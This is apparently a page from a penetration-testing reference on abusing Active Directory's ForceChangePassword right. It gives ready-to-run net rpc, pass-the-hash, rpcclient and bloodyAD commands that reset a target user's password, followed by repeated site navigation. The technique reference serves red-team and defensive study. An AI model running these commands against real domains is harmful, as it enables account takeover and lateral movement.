ForceChangePassword

This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.

It can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.

bash

# With net and cleartext credentials (will be prompted)
net rpc password "$TargetUser" -U "$DOMAIN"/"$USER" -S "$DC_HOST"

# With net and cleartext credentials
net rpc password "$TargetUser" -U "$DOMAIN"/"$USER"%"$PASSWORD" -S "$DC_HOST"

# With Pass-the-Hash
pth-net rpc password "$TargetUser" -U "$DOMAIN"/"$USER"%"ffffffffffffffffffffffffffffffff":"$NT_HASH" -S "$DC_HOST"

The rpcclient can also be used on UNIX-like systems when the package samba-common-bin is missing.

bash

rpcclient -U $DOMAIN/$ControlledUser $DomainController
rpcclient $> setuserinfo2 $TargetUser 23 $NewPassword

Alternatively, it can be achieved using bloodyAD

bash

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"

Reconnaissance

Movement

Credentials

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Netlogon

Certificate Services (AD-CS)

SCCM / MECM

Exchange services

Print Spooler Service

Schannel

Built-ins & settings

Kerberos

Certificate Services (AD-CS)

HTTP security headers

Identity and Access Management

File inclusion

LFI to RCE

Initial access (protocols)

Windows

UNIX-like

(AV) Anti-Virus

Mifare Classic

Android

ForceChangePassword

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Certificate Services (AD-CS)

SCCM / MECM

Certificate Services (AD-CS)

HTTP security headers

File inclusion

LFI to RCE

Windows

UNIX-like

Mifare Classic

ForceChangePassword ​

ForceChangePassword